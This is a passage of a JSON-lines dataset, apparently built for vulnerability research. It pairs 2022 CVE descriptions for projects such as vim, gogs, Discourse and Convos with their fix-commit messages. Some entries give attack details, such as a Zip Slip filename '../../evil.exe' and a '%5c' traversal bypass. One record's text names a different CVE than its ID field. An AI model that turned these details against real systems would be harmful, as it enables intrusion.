vm.c (hash_new_from_regs): stack may be reallocated.", "cve_id": "CVE-2022-1934", "source": "cvefixes", "timestamp": ""} {"id": "d8f12c9af84b05e89afe", "text": "CVE: CVE-2022-1942\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5043: can open a cmdline window from a substitute expression\n\nProblem: Can open a cmdline window from a substitute expression.\nSolution: Disallow opening a command line window when text or buffer is\n locked.", "cve_id": "CVE-2022-1942", "source": "cvefixes", "timestamp": ""} {"id": "dbf0d21c67f543a96afc", "text": "CVE: CVE-2022-1947\n\n[{'lang': 'en', 'value': 'Use of Incorrect Operator in GitHub repository polonel/trudesk prior to 1.2.3.'}]\n\nFix commit: fix(messages): invalid permissions", "cve_id": "CVE-2022-1947", "source": "cvefixes", "timestamp": ""} {"id": "ad741d4640fd1cbb6573", "text": "CVE: CVE-2022-1968\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5050: using freed memory when searching for pattern in path\n\nProblem: Using freed memory when searching for pattern in path.\nSolution: Make a copy of the line.", "cve_id": "CVE-2022-1968", "source": "cvefixes", "timestamp": ""} {"id": "7a5f12839987a54803a0", "text": "CVE: CVE-2022-1986\n\n[{'lang': 'en', 'value': 'OS Command Injection in GitHub repository gogs/gogs prior to 0.12.9.'}]\n\nFix commit: repo_editor: check both styles of `os.PathSeparator` in all systems (#7005)", "cve_id": "CVE-2022-1986", "source": "cvefixes", "timestamp": ""} {"id": "764eedb8ced6403502c7", "text": "CVE: CVE-2022-1987\n\n[{'lang': 'en', 'value': 'Buffer Over-read in GitHub repository bfabiszewski/libmobi prior to 0.11.'}]\n\nFix commit: Fix: index entry label not being zero-terminated with corrupt input", "cve_id": "CVE-2022-1987", "source": "cvefixes", "timestamp": ""} {"id": "8cba5f0786e3c4de7d82", "text": "CVE: CVE-2022-1988\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Generic in GitHub repository neorazorx/facturascripts prior to 2022.09.'}]\n\nFix commit: - Añadida comprobación de html en descripción al test unitario del modelo cuenta.\n- Eliminado el test unitario de subcuenta por obsoleto. Se creará uno nuevo a continuación.", "cve_id": "CVE-2022-1988", "source": "cvefixes", "timestamp": ""} {"id": "a950bf4ee8c43cd13fb7", "text": "CVE: CVE-2022-1992\n\n[{'lang': 'en', 'value': 'Path Traversal in GitHub repository gogs/gogs prior to 0.12.9.'}]\n\nFix commit: pathutil: check both styles of `os.PathSeparator` (#7020)", "cve_id": "CVE-2022-1992", "source": "cvefixes", "timestamp": ""} {"id": "bd0b8f2d9710343b54d8", "text": "CVE: CVE-2022-1993\n\n[{'lang': 'en', 'value': 'Path Traversal in GitHub repository gogs/gogs prior to 0.12.9.'}]\n\nFix commit: http: clean request path from Git endpoints (#7022)", "cve_id": "CVE-2022-1993", "source": "cvefixes", "timestamp": ""} {"id": "11079f3c55a582d534b0", "text": "CVE: CVE-2022-1996\n\n[{'lang': 'en', 'value': 'Authorization Bypass Through User-Controlled Key in GitHub repository emicklei/go-restful prior to v3.8.0.'}]\n\nFix commit: use exact matching of allowed domain entries, issue #489 (#493)\n\n* use exact matching of allowed domain entries, issue #489\r\n\r\n* update doc, add testcases from PR conversation\r\n\r\n* introduce AllowedDomainFunc #489\r\n\r\n* more tests, fix doc\r\n\r\n* lowercase origin before checking cors", "cve_id": "CVE-2022-1996", "source": "cvefixes", "timestamp": ""} {"id": "a20bd34d984ee52068cc", "text": "CVE: CVE-2022-1997\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository francoisjacquet/rosariosis prior to 9.0.'}]\n\nFix commit: Fix stored XSS security issue: remove inline JS from URL in PreparePHP_SELF.fnc.php", "cve_id": "CVE-2022-1997", "source": "cvefixes", "timestamp": ""} {"id": "36e2299c8ae252156bea", "text": "CVE: CVE-2022-2000\n\n[{'lang': 'en', 'value': 'Out-of-bounds Write in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5063: error for a command may go over the end of IObuff\n\nProblem: Error for a command may go over the end of IObuff.\nSolution: Truncate the message.", "cve_id": "CVE-2022-2000", "source": "cvefixes", "timestamp": ""} {"id": "23b68b69bc9cf7fde6d5", "text": "CVE: CVE-2022-2014\n\n[{'lang': 'en', 'value': 'Code Injection in GitHub repository jgraph/drawio prior to 19.0.2.'}]\n\nFix commit: 19.0.2 release", "cve_id": "CVE-2022-2014", "source": "cvefixes", "timestamp": ""} {"id": "29e59b5a924213ed37f9", "text": "CVE: CVE-2022-2015\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository jgraph/drawio prior to 19.0.2.'}]\n\nFix commit: 19.0.2 release", "cve_id": "CVE-2022-2015", "source": "cvefixes", "timestamp": ""} {"id": "341e7d5d3fc127d901cc", "text": "CVE: CVE-2022-2016\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in GitHub repository neorazorx/facturascripts prior to 2022.1.'}]\n\nFix commit: Escaped the html of the balance fields before any other tests. Also added the corresponding unit test.\n------\nEscapado el html de los campos del balance antes de cualquier otro test. Añadido también el correspondiente test unitario.", "cve_id": "CVE-2022-2016", "source": "cvefixes", "timestamp": ""} {"id": "6aeb6e57fe3accd0c7eb", "text": "CVE: CVE-2022-2023\n\n[{'lang': 'en', 'value': 'Incorrect Use of Privileged APIs in GitHub repository polonel/trudesk prior to 1.2.4.'}]\n\nFix commit: fix(accounts): security enhancement", "cve_id": "CVE-2022-2023", "source": "cvefixes", "timestamp": ""} {"id": "bead920423c61a1ed503", "text": "CVE: CVE-2022-2026\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository kromitgmbh/titra prior to 0.77.0.'}]\n\nFix commit: 🔒 fixes three critical stored XSS vulnerabilities thanks @saharshtapi for reporting this\n🔒 fixes a formula injection vulnerability in the Excel export functionality thanks @saharshtapi for reprorting this\n❗️this is an important security release, we recommend to migrate asap, all titra versions below version 0.77.0 are considered insecure for pro", "cve_id": "CVE-2022-2026", "source": "cvefixes", "timestamp": ""} {"id": "64ae6d204df89e0fe990", "text": "CVE: CVE-2022-2027\n\n[{'lang': 'en', 'value': 'Improper Neutralization of Formula Elements in a CSV File in GitHub repository kromitgmbh/titra prior to 0.77.0.'}]\n\nFix commit: 🔒 fixes three critical stored XSS vulnerabilities thanks @saharshtapi for reporting this\n🔒 fixes a formula injection vulnerability in the Excel export functionality thanks @saharshtapi for reprorting this\n❗️this is an important security release, we recommend to migrate asap, all titra versions below version 0.77.0 are consi", "cve_id": "CVE-2022-2027", "source": "cvefixes", "timestamp": ""} {"id": "36bb482f41e770111507", "text": "CVE: CVE-2022-2028\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Generic in GitHub repository kromitgmbh/titra prior to 0.77.0.'}]\n\nFix commit: 🔒 fixes three critical stored XSS vulnerabilities thanks @saharshtapi for reporting this\n🔒 fixes a formula injection vulnerability in the Excel export functionality thanks @saharshtapi for reprorting this\n❗️this is an important security release, we recommend to migrate asap, all titra versions below version 0.77.0 are considered insecure for pr", "cve_id": "CVE-2022-2028", "source": "cvefixes", "timestamp": ""} {"id": "f560465992e25b386313", "text": "CVE: CVE-2022-2029\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - DOM in GitHub repository kromitgmbh/titra prior to 0.77.0.'}]\n\nFix commit: 🔒 fixes three critical stored XSS vulnerabilities thanks @saharshtapi for reporting this\n🔒 fixes a formula injection vulnerability in the Excel export functionality thanks @saharshtapi for reprorting this\n❗️this is an important security release, we recommend to migrate asap, all titra versions below version 0.77.0 are considered insecure for produc", "cve_id": "CVE-2022-2029", "source": "cvefixes", "timestamp": ""} {"id": "912c6954fe7f4b5ff253", "text": "CVE: CVE-2022-2036\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository francoisjacquet/rosariosis prior to 9.0.1.'}]\n\nFix commit: Fix stored XSS security issue: decode HTML entities from URL", "cve_id": "CVE-2022-2036", "source": "cvefixes", "timestamp": ""} {"id": "ec1b3113c720fe9d8828", "text": "CVE: CVE-2022-2037\n\n[{'lang': 'en', 'value': 'Excessive Attack Surface in GitHub repository tooljet/tooljet prior to v1.16.0.'}]\n\nFix commit: [BUG] Account level security issue (#3150)\n\n* bug fixes\r\n\r\n* changes\r\n\r\n* changes for single workspace support\r\n\r\n* added guards for signup route\r\n\r\n* test cases fixes\r\n\r\n* Workspace invite and user onboarding flow changes (#3190)\r\n\r\n* invite user flow changes\r\n\r\n* review comments\r\n\r\n* cleanup\r\n\r\n* testcase fix", "cve_id": "CVE-2022-2037", "source": "cvefixes", "timestamp": ""} {"id": "b39fe671459ab9e56128", "text": "CVE: CVE-2022-2042\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5072: using uninitialized value and freed memory in spell command\n\nProblem: Using uninitialized value and freed memory in spell command.\nSolution: Initialize \"attr\". Check for empty line early.", "cve_id": "CVE-2022-2042", "source": "cvefixes", "timestamp": ""} {"id": "b3b2c6fd21e876bef358", "text": "CVE: CVE-2022-2060\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository dolibarr/dolibarr prior to 16.0.'}]\n\nFix commit: Merge branch 'develop' of git@github.com:Dolibarr/dolibarr.git into develop", "cve_id": "CVE-2022-2060", "source": "cvefixes", "timestamp": ""} {"id": "ff47d94809b66bd03a9f", "text": "CVE: CVE-2022-2061\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository hpjansson/chafa prior to 1.12.0.'}]\n\nFix commit: libnsgif: fix oob in lzw_decode", "cve_id": "CVE-2022-2061", "source": "cvefixes", "timestamp": ""} {"id": "5f5b525c46862f44ba83", "text": "CVE: CVE-2022-2065\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository neorazorx/facturascripts prior to 2022.06.'}]\n\nFix commit: Force to download SVG files to prevent security problems.\n------\nForzamos a descargar los archivos SVG para evitar problemas de seguridad.", "cve_id": "CVE-2022-2065", "source": "cvefixes", "timestamp": ""} {"id": "f08b78bb01e226e9406f", "text": "CVE: CVE-2022-2066\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in GitHub repository neorazorx/facturascripts prior to 2022.06.'}]\n\nFix commit: Sanitized username when showing user not found message.\n------\nSaneado nombre de usuario al mostrar el mensaje de usuario no encontrado.", "cve_id": "CVE-2022-2066", "source": "cvefixes", "timestamp": ""} {"id": "d7c25157ad42b68292e7", "text": "CVE: CVE-2022-2067\n\n[{'lang': 'en', 'value': 'SQL Injection in GitHub repository francoisjacquet/rosariosis prior to 9.0.'}]\n\nFix commit: Fix SQL injection escape DB identifier", "cve_id": "CVE-2022-2067", "source": "cvefixes", "timestamp": ""} {"id": "c7f4cce90039da2030a2", "text": "CVE: CVE-2022-2073\n\n[{'lang': 'en', 'value': 'Code Injection in GitHub repository getgrav/grav prior to 1.7.34.'}]\n\nFix commit: Fixed Twig `|filter()` allowing code execution", "cve_id": "CVE-2022-2073", "source": "cvefixes", "timestamp": ""} {"id": "108150f3d8ad55c6a48f", "text": "CVE: CVE-2022-2098\n\n[{'lang': 'en', 'value': 'Weak Password Requirements in GitHub repository kromitgmbh/titra prior to 0.78.1.'}]\n\nFix commit: 🔒 fixed further security vulnerabilities adding additional password validation\n💄 improved light and dark theme (thanks @thomas-kromit)", "cve_id": "CVE-2022-2098", "source": "cvefixes", "timestamp": ""} {"id": "cf433fb6b00d41d32e16", "text": "CVE: CVE-2022-21122\n\n[{'lang': 'en', 'value': \"The package metacalc before 0.0.2 are vulnerable to Arbitrary Code Execution when it exposes JavaScript's Math class to the v8 context. As the Math class is exposed to user-land, it can be used to get access to JavaScript's Function constructor.\"}]\n\nFix commit: Prevent arbitrary js code execution\n\nPR-URL: https://github.com/metarhia/metacalc/pull/16", "cve_id": "CVE-2022-21122", "source": "cvefixes", "timestamp": ""} {"id": "197f2112888ca9f3dcb5", "text": "CVE: CVE-2022-21144\n\n[{'lang': 'en', 'value': \"This affects all versions of package libxmljs. When invoking the libxmljs.parseXml function with a non-buffer argument the V8 code will attempt invoking the .toString method of the argument. If the argument's toString value is not a Function object V8 will crash.\"}]\n\nFix commit: Ensure parseXml/parseHtml input is string or buffer (#594)", "cve_id": "CVE-2022-21144", "source": "cvefixes", "timestamp": ""} {"id": "3134720f7014f25e4840", "text": "CVE: CVE-2022-21159\n\n[{'lang': 'en', 'value': 'A denial of service vulnerability exists in the parseNormalModeParameters functionality of MZ Automation GmbH libiec61850 1.5.0. A specially-crafted series of network requests can lead to denial of service. An attacker can send a sequence of malformed iec61850 messages to trigger this vulnerability.'}]\n\nFix commit: - fixed - Bug in presentation layer parser can cause infinite loop (LIB61850-302)", "cve_id": "CVE-2022-21159", "source": "cvefixes", "timestamp": ""} {"id": "7c7273beffe50310fe8d", "text": "CVE: CVE-2022-21164\n\n[{'lang': 'en', 'value': 'The package node-lmdb before 0.9.7 are vulnerable to Denial of Service (DoS) when defining a non-invokable ToString value, which will cause a crash during type check.'}]\n\nFix commit: Perform argument check for putString", "cve_id": "CVE-2022-21164", "source": "cvefixes", "timestamp": ""} {"id": "371465c0ff9ca16f4fea", "text": "CVE: CVE-2022-21189\n\n[{'lang': 'en', 'value': 'The package dexie before 3.2.2, from 4.0.0-alpha.1 and before 4.0.0-alpha.3 are vulnerable to Prototype Pollution in the Dexie.setByKeyPath(obj, keyPath, value) function which does not properly check the keys being set (like __proto__ or constructor). This can allow an attacker to add/modify properties of the Object.prototype leading to prototype pollution vulnerability. **Note:** This vulnerability can occur in multiple ways, for example when modif", "cve_id": "CVE-2022-21189", "source": "cvefixes", "timestamp": ""} {"id": "6ef9e8a7718baf5cf200", "text": "CVE: CVE-2022-21190\n\n[{'lang': 'en', 'value': \"This affects the package convict before 6.2.3. This is a bypass of [CVE-2022-22143](https://security.snyk.io/vuln/SNYK-JS-CONVICT-2340604). The [fix](https://github.com/mozilla/node-convict/commit/3b86be087d8f14681a9c889d45da7fe3ad9cd880) introduced, relies on the startsWith method and does not prevent the vulnerability: before splitting the path, it checks if it starts with __proto__ or this.constructor.prototype. To bypass this check it's possible", "cve_id": "CVE-2022-21190", "source": "cvefixes", "timestamp": ""} {"id": "83af833af0309d3dadb6", "text": "CVE: CVE-2022-21208\n\n[{'lang': 'en', 'value': 'The package node-opcua before 2.74.0 are vulnerable to Denial of Service (DoS) due to a missing limitation on the number of received chunks - per single session or in total for all concurrent sessions. An attacker can exploit this vulnerability by sending an unlimited number of huge chunks (e.g. 2GB each) without sending the Final closing chunk.'}]\n\nFix commit: fix message chunk overflow detection", "cve_id": "CVE-2022-21208", "source": "cvefixes", "timestamp": ""} {"id": "4a77545dce9261f8ebf3", "text": "CVE: CVE-2022-21208\n\n[{'lang': 'en', 'value': 'The package node-opcua before 2.74.0 are vulnerable to Denial of Service (DoS) due to a missing limitation on the number of received chunks - per single session or in total for all concurrent sessions. An attacker can exploit this vulnerability by sending an unlimited number of huge chunks (e.g. 2GB each) without sending the Final closing chunk.'}]\n\nFix commit: PacketAssembler add chunksize verification & refactor", "cve_id": "CVE-2022-21208", "source": "cvefixes", "timestamp": ""} {"id": "6311a41e501552029d91", "text": "CVE: CVE-2022-21221\n\n[{'lang': 'en', 'value': 'The package github.com/valyala/fasthttp before 1.34.0 are vulnerable to Directory Traversal via the ServeFile function, due to improper sanitization. It is possible to be exploited by using a backslash %5c character in the path. **Note:** This security issue impacts Windows users only.'}]\n\nFix commit: Warn about unsafe ServeFile usage (#1228)\n\nSee: https://github.com/valyala/fasthttp/issues/1226", "cve_id": "CVE-2022-21221", "source": "cvefixes", "timestamp": ""} {"id": "ce31f65c312d14ad2d32", "text": "CVE: CVE-2022-21221\n\n[{'lang': 'en', 'value': 'The package github.com/valyala/fasthttp before 1.34.0 are vulnerable to Directory Traversal via the ServeFile function, due to improper sanitization. It is possible to be exploited by using a backslash %5c character in the path. **Note:** This security issue impacts Windows users only.'}]\n\nFix commit: Add windows support to normalizePath\n\nThis is probably still not 100% sure and there are still many bugs with\nFS on windows. But it's a slight improve", "cve_id": "CVE-2022-21221", "source": "cvefixes", "timestamp": ""} {"id": "1d5a266de95cfc3cb337", "text": "CVE: CVE-2022-21227\n\n[{'lang': 'en', 'value': 'The package sqlite3 before 5.0.3 are vulnerable to Denial of Service (DoS) which will invoke the toString function of the passed parameter. If passed an invalid Function object it will throw and crash the V8 engine.'}]\n\nFix commit: bug: fix segfault of invalid toString() object (#1450)\n\n* bug: verify toString() returns valid data\r\n* test: faulty toString test", "cve_id": "CVE-2022-21227", "source": "cvefixes", "timestamp": ""} {"id": "7254be1c24e89bae5c13", "text": "CVE: CVE-2022-2124\n\n[{'lang': 'en', 'value': 'Buffer Over-read in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5120: searching for quotes may go over the end of the line\n\nProblem: Searching for quotes may go over the end of the line.\nSolution: Check for running into the NUL.", "cve_id": "CVE-2022-2124", "source": "cvefixes", "timestamp": ""} {"id": "0347e548d2547bde9fd0", "text": "CVE: CVE-2022-2125\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5122: lisp indenting my run over the end of the line\n\nProblem: Lisp indenting my run over the end of the line.\nSolution: Check for NUL earlier.", "cve_id": "CVE-2022-2125", "source": "cvefixes", "timestamp": ""} {"id": "f2660650cc4f8c47fb22", "text": "CVE: CVE-2022-2126\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5123: using invalid index when looking for spell suggestions\n\nProblem: Using invalid index when looking for spell suggestions.\nSolution: Do not decrement the index when it is zero.", "cve_id": "CVE-2022-2126", "source": "cvefixes", "timestamp": ""} {"id": "736c5e458cf51b4097f9", "text": "CVE: CVE-2022-2128\n\n[{'lang': 'en', 'value': 'Unrestricted Upload of File with Dangerous Type in GitHub repository polonel/trudesk prior to 1.2.4.'}]\n\nFix commit: fix(attachments): file type security fix", "cve_id": "CVE-2022-2128", "source": "cvefixes", "timestamp": ""} {"id": "d339f7bc64ae896a0f32", "text": "CVE: CVE-2022-2129\n\n[{'lang': 'en', 'value': 'Out-of-bounds Write in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5126: substitute may overrun destination buffer\n\nProblem: Substitute may overrun destination buffer.\nSolution: Disallow switching buffers in a substitute expression.", "cve_id": "CVE-2022-2129", "source": "cvefixes", "timestamp": ""} {"id": "67e018ec1e1be31c2b2f", "text": "CVE: CVE-2022-2130\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.17.'}]\n\nFix commit: Merge branch 'dev' of github.com:microweber/microweber into dev", "cve_id": "CVE-2022-2130", "source": "cvefixes", "timestamp": ""} {"id": "a5c1ac904c9d24832470", "text": "CVE: CVE-2022-2134\n\n[{'lang': 'en', 'value': 'Denial of Service in GitHub repository inventree/inventree prior to 0.8.0.'}]\n\nFix commit: Remove reliance on django-markdownx (#3231)\n\n* Remove reliance on django-markdownx\r\n\r\n- We are now rendering notes on the client side using easymde\r\n- No longer any need to utilize the markdownx integration\r\n- Adds character limit for notes fields`\r\n\r\n* Adjust legacy migrations - remove references to markdownx\r\n\r\n* Fix bug for company notes field", "cve_id": "CVE-2022-2134", "source": "cvefixes", "timestamp": ""} {"id": "d4c7d44dd8ea1b024cd6", "text": "CVE: CVE-2022-21504\n\n[{'lang': 'en', 'value': 'The code in UEK6 U3 was missing an appropiate file descriptor count to be missing. This resulted in a use count error that allowed a file descriptor to a socket to be closed and freed while it was still in use by another portion of the kernel. An attack with local access can operate on the socket, and cause a denial of service. CVSS 3.1 Base Score 6.2 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).'}]\n\nFix commit", "cve_id": "CVE-2022-21504", "source": "cvefixes", "timestamp": ""} {"id": "e3a75ffc7f87e0b9f13c", "text": "CVE: CVE-2022-21642\n\n[{'lang': 'en', 'value': 'Discourse is an open source platform for community discussion. In affected versions when composing a message from topic the composer user suggestions reveals whisper participants. The issue has been patched in stable version 2.7.13 and beta version 2.8.0.beta11. There is no workaround for this issue and users are advised to upgrade.'}]\n\nFix commit: SECURITY: only show user suggestions with regular post (#15436)", "cve_id": "CVE-2022-21642", "source": "cvefixes", "timestamp": ""} {"id": "7cb8cc7eb5c39f003ea4", "text": "CVE: CVE-2022-21646\n\n[{'lang': 'en', 'value': 'SpiceDB is a database system for managing security-critical application permissions. Any user making use of a wildcard relationship under the right hand branch of an `exclusion` or within an `intersection` operation will see `Lookup`/`LookupResources` return a resource as \"accessible\" if it is *not* accessible by virtue of the inclusion of the wildcard in the intersection or the right side of the exclusion. In `v1.3.0`, the wildcard is ignored entir", "cve_id": "CVE-2022-21646", "source": "cvefixes", "timestamp": ""} {"id": "8c44ed45ce15eddd6649", "text": "CVE: CVE-2022-21647\n\n[{'lang': 'en', 'value': 'CodeIgniter is an open source PHP full-stack web framework. Deserialization of Untrusted Data was found in the `old()` function in CodeIgniter4. Remote attackers may inject auto-loadable arbitrary objects with this vulnerability, and possibly execute existing PHP code on the server. We are aware of a working exploit, which can lead to SQL injection. Users are advised to upgrade to v4.1.6 or later. Users unable to upgrade as advised to not use the `o", "cve_id": "CVE-2022-21647", "source": "cvefixes", "timestamp": ""} {"id": "1a85e4335c4f1995acfd", "text": "CVE: CVE-2022-21648\n\n[{'lang': 'en', 'value': 'Latte is an open source template engine for PHP. Versions since 2.8.0 Latte has included a template sandbox and in affected versions it has been found that a sandbox escape exists allowing for injection into web pages generated from Latte. This may lead to XSS attacks. The issue is fixed in the versions 2.8.8, 2.9.6 and 2.10.8. Users unable to upgrade should not accept template input from untrusted sources.'}]\n\nFix commit: PhpWriter: complex express", "cve_id": "CVE-2022-21648", "source": "cvefixes", "timestamp": ""} {"id": "303ce36f4e646e53cf88", "text": "CVE: CVE-2022-21649\n\n[{'lang': 'en', 'value': 'Convos is an open source multi-user chat that runs in a web browser. Characters starting with \"https://\" in the chat window create an tag. Stored XSS vulnerability using onfocus and autofocus occurs because escaping exists for \"<\" or \">\" but escaping for double quotes does not exist. Through this vulnerability, an attacker is capable to execute malicious scripts. Users are advised to update as soon as possible.'}]\n\nFix commit: Fix XSS vulnerabil", "cve_id": "CVE-2022-21649", "source": "cvefixes", "timestamp": ""} {"id": "403dc21b9a9e6741f108", "text": "CVE: CVE-2022-21650\n\n[{'lang': 'en', 'value': \"Convos is an open source multi-user chat that runs in a web browser. You can't use SVG extension in Convos' chat window, but you can upload a file with an .html extension. By uploading an SVG file with an html extension the upload filter can be bypassed. This causes Stored XSS. Also, after uploading a file the XSS attack is triggered upon a user viewing the file. Through this vulnerability, an attacker is capable to execute malicious scripts. Users ", "cve_id": "CVE-2022-21650", "source": "cvefixes", "timestamp": ""} {"id": "c048da80448876cb1d1d", "text": "CVE: CVE-2022-21651\n\n[{'lang': 'en', 'value': 'Shopware is an open source e-commerce software platform. An open redirect vulnerability has been discovered. Users may be arbitrary redirected due to incomplete URL handling in the shopware router. This issue has been resolved in version 5.7.7. There is no workaround and users are advised to upgrade as soon as possible.'}]\n\nFix commit: SW-26435 - Improve routing", "cve_id": "CVE-2022-21651", "source": "cvefixes", "timestamp": ""} {"id": "1365073c591fe4dacd5e", "text": "CVE: CVE-2022-21652\n\n[{'lang': 'en', 'value': \"Shopware is an open source e-commerce software platform. In affected versions shopware would not invalidate a user session in the event of a password change. With version 5.7.7 the session validation was adjusted, so that sessions created prior to the latest password change of a customer account can't be used to login with said account. This also means, that upon a password change, all existing sessions for a given customer account are automatically", "cve_id": "CVE-2022-21652", "source": "cvefixes", "timestamp": ""} {"id": "9b71b2d7b1d937bd8ad5", "text": "CVE: CVE-2022-21654\n\n[{'lang': 'en', 'value': \"Envoy is an open source edge and service proxy, designed for cloud-native applications. Envoy's tls allows re-use when some cert validation settings have changed from their default configuration. The only workaround for this issue is to ensure that default tls settings are used. Users are advised to upgrade.\"}]\n\nFix commit: CVE-2022-21654\n\ntls allows re-use when some cert validation settings have changed\n\nSigned-off-by: Yan Avlasov ", "cve_id": "CVE-2022-21670", "source": "cvefixes", "timestamp": ""} {"id": "3fb25796e1cc6d472413", "text": "CVE: CVE-2022-21671\n\n[{'lang': 'en', 'value': \"@replit/crosis is a JavaScript client that speaks Replit's container protocol. A vulnerability that involves exposure of sensitive information exists in versions prior to 7.3.1. When using this library as a way to programmatically communicate with Replit in a standalone fashion, if there are multiple failed attempts to contact Replit through a WebSocket, the library will attempt to communicate using a fallback poll-based proxy. The URL of the proxy ", "cve_id": "CVE-2022-21671", "source": "cvefixes", "timestamp": ""} {"id": "88737addda14f294651f", "text": "CVE: CVE-2022-21675\n\n[{'lang': 'en', 'value': 'Bytecode Viewer (BCV) is a Java/Android reverse engineering suite. Versions of the package prior to 2.11.0 are vulnerable to Arbitrary File Write via Archive Extraction (AKA \"Zip Slip\"). The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../evil.exe). The Zip Slip vulnerability can affect numerous archive formats, including zip, jar, tar, war, cpio, apk, rar and 7z. The attacker can the", "cve_id": "CVE-2022-21675", "source": "cvefixes", "timestamp": ""} {"id": "b5b49cc437c8d26486ed", "text": "CVE: CVE-2022-21676\n\n[{'lang': 'en', 'value': 'Engine.IO is the implementation of transport-based cross-browser/cross-device bi-directional communication layer for Socket.IO. A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process. This impacts all the users of the `engine.io` package starting from version `4.0.0`, including those who uses depending packages like `socket.io`. Versions prior to `4.0.0` are not impacted. A fix ha", "cve_id": "CVE-2022-21676", "source": "cvefixes", "timestamp": ""} {"id": "75265bfb04aa90b4a072", "text": "CVE: CVE-2022-21677\n\n[{'lang': 'en', 'value': \"Discourse is an open source discussion platform. Discourse groups can be configured with varying visibility levels for the group as well as the group members. By default, a newly created group has its visibility set to public and the group's members visibility set to public as well. However, a group's visibility and the group's members visibility can be configured such that it is restricted to logged on users, members of the group or staff users. A ", "cve_id": "CVE-2022-21677", "source": "cvefixes", "timestamp": ""} {"id": "8e144cff917cad98e496", "text": "CVE: CVE-2022-21678\n\n[{'lang': 'en', 'value': \"Discourse is an open source discussion platform. Prior to version 2.8.0.beta11 in the `tests-passed` branch, version 2.8.0.beta11 in the `beta` branch, and version 2.7.13 in the `stable` branch, the bios of users who made their profiles private were still visible in the `` tags on their users' pages. The problem is patched in `tests-passed` version 2.8.0.beta11, `beta` version 2.8.0.beta11, and `stable` version 2.7.13 of Discourse.\"}]\n\nFix com", "cve_id": "CVE-2022-21678", "source": "cvefixes", "timestamp": ""} {"id": "f1b68d6bf349c21859cf", "text": "CVE: CVE-2022-21680\n\n[{'lang': 'en', 'value': 'Marked is a markdown parser and compiler. Prior to version 4.0.10, the regular expression `block.def` may cause catastrophic backtracking against some strings and lead to a regular expression denial of service (ReDoS). Anyone who runs untrusted markdown through a vulnerable version of marked and does not use a worker with a time limit may be affected. This issue is patched in version 4.0.10. As a workaround, avoid running untrusted markdown through ", "cve_id": "CVE-2022-21680", "source": "cvefixes", "timestamp": ""} {"id": "dea0a21490332841635c", "text": "CVE: CVE-2022-21681\n\n[{'lang': 'en', 'value': 'Marked is a markdown parser and compiler. Prior to version 4.0.10, the regular expression `inline.reflinkSearch` may cause catastrophic backtracking against some strings and lead to a denial of service (DoS). Anyone who runs untrusted markdown through a vulnerable version of marked and does not use a worker with a time limit may be affected. This issue is patched in version 4.0.10. As a workaround, avoid running untrusted markdown through marked or ", "cve_id": "CVE-2022-21681", "source": "cvefixes", "timestamp": ""} {"id": "df5f4bc093316f5129a0", "text": "CVE: CVE-2022-21682\n\n[{'lang': 'en', 'value': 'Flatpak is a Linux application sandboxing and distribution framework. A path traversal vulnerability affects versions of Flatpak prior to 1.12.3 and 1.10.6. flatpak-builder applies `finish-args` last in the build. At this point the build directory will have the full access that is specified in the manifest, so running `flatpak build` against it will gain those permissions. Normally this will not be done, so this is not problem. However, if `--mirror", "cve_id": "CVE-2022-21682", "source": "cvefixes", "timestamp": ""} {"id": "955299e530fcd939f0d3", "text": "CVE: CVE-2022-21683\n\n[{'lang': 'en', 'value': 'Wagtail is a Django based content management system focused on flexibility and user experience. When notifications for new replies in comment threads are sent, they are sent to all users who have replied or commented anywhere on the site, rather than only in the relevant threads. This means that a user could listen in to new comment replies on pages they have not have editing access to, as long as they have left a comment or reply somewhere on the s", "cve_id": "CVE-2022-21683", "source": "cvefixes", "timestamp": ""} {"id": "900f73685adc882087b4", "text": "CVE: CVE-2022-21684\n\n[{'lang': 'en', 'value': 'Discourse is an open source discussion platform. Versions prior to 2.7.13 in `stable`, 2.8.0.beta11 in `beta`, and 2.8.0.beta11 in `tests-passed` allow some users to log in to a community before they should be able to do so. A user invited via email to a forum with `must_approve_users` enabled is going to be automatically logged in, bypassing the check that does not allow unapproved users to sign in. They will be able to do everything an approved us", "cve_id": "CVE-2022-21684", "source": "cvefixes", "timestamp": ""} {"id": "ba42687fae57afd2ad72", "text": "CVE: CVE-2022-21685\n\n[{'lang': 'en', 'value': \"Frontier is Substrate's Ethereum compatibility layer. Prior to commit number `8a93fdc6c9f4eb1d2f2a11b7ff1d12d70bf5a664`, a bug in Frontier's MODEXP precompile implementation can cause an integer underflow in certain conditions. This will cause a node crash for debug builds. For release builds (and production WebAssembly binaries), the impact is 